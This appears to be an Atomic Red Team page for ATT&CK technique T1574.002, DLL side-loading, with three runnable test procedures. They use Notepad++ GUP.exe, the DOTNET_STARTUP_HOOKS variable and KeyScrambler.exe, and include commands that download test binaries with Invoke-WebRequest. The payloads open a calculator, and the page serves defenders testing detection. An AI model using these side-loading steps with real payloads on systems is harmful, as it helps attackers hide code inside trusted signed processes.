T1574.002
Hijack Execution Flow: DLL Side-Loading
Description from ATT&CK
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking, side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)
Atomic Tests
Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary
GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. Upon execution, calc.exe will be opened.
Supported Platforms: windows
auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
process_name | Name of the created process | string | calculator.exe |
gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | path | PathToAtomicsFolder\T1574.002\bin\GUP.exe |
Attack Commands: Run with command_prompt!
1
"#{gup_executable}"
Cleanup Commands:
1
taskkill /F /IM #{process_name} >nul 2>&1
Dependencies: Run with powershell!
Description: Gup.exe binary must exist on disk at specified location (#{gup_executable})
Check Prereq Commands:
1
if (Test-Path "#{gup_executable}") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
New-Item -Type Directory (split-path "#{gup_executable}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}"
Atomic Test #2 - DLL Side-Loading using the dotnet startup hook environment variable
Utilizing the dotnet_startup_hooks environment variable, this method allows for registering a global method in an assembly that will be executed whenever a .net core application is started. This unlocks a whole range of scenarios, from injecting a profiler to tweaking a static context in a given environment. blog post
Supported Platforms: windows
auto_generated_guid: d322cdd7-7d60-46e3-9111-648848da7c02
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
process_name | Name of the created process | string | calculator.exe |
preloader_dll | library for interfacing with the dotnet framework | path | PathToAtomicsFolder\T1574.002\bin\preloader.dll |
Attack Commands: Run with command_prompt!
1
2
3
set DOTNET_STARTUP_HOOKS="#{preloader_dll}"
dotnet -h > nul
echo.
Cleanup Commands:
1
taskkill /F /IM #{process_name} >nul 2>&1
Dependencies: Run with powershell!
Description: .Net SDK must be installed
Check Prereq Commands:
1
if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null
echo.
Description: preloader must exist
Check Prereq Commands:
1
if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1}
Get Prereq Commands:
1
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/preloader?raw=true" -OutFile "#{preloader_dll}"
Atomic Test #3 - DLL Search Order Hijacking,DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE
Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe", which can load further executables embedded in modified KeyScramblerIE.dll file.
Supported Platforms: windows
auto_generated_guid: c095ad8e-4469-4d33-be9d-6f6d1fb21585
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
7
8
9
Write-Host 1.Downloading KeyScrambler from official website to temp directory
Invoke-WebRequest -Uri "https://download.qfxsoftware.com/download/latest/KeyScrambler_Setup.exe" -OutFile $env:Temp\KeyScrambler_Setup.exe
Write-Host 2.Installing KeyScrambler with KeyScrambler_Setup.exe from temp directory
Start-Process -FilePath $env:Temp\KeyScrambler_Setup.exe -ArgumentList /S -Wait
Write-Host 3.Copying KeyScrambler.exe to temp folder,to avoid permission issues, which calls KeyScramblerIE.dll in CWD i.e. temp
Copy-Item "C:\Program Files (x86)\KeyScrambler\KeyScrambler.exe" -Destination $env:TEMP\KeyScrambler.exe
Write-Host 4.Executing KeyScrambler.exe, you should see a popup of missing KeyScramblerIE.dll, you can close this popup
Start-Process -FilePath $env:Temp\KeyScrambler.exe
Write-Host 5.A modified KeyScramblerIE.dll can be copied to temp, which can be misused by Attacker
Cleanup Commands:
1
2
3
4
5
6
Write-Host 1.Kindly close the popup window asking for KeyScramblerIE.dll ,so that it gets deleted.
Remove-Item -Path $env:Temp\KeyScrambler_Setup.exe
Start-Process -FilePath "C:\Program Files (x86)\KeyScrambler\Uninstall.exe" -ArgumentList /S -Wait
Remove-Item -Path $env:Temp\KeyScrambler.exe
Write-Host 2.KeyScrambler cleanup completed successfully.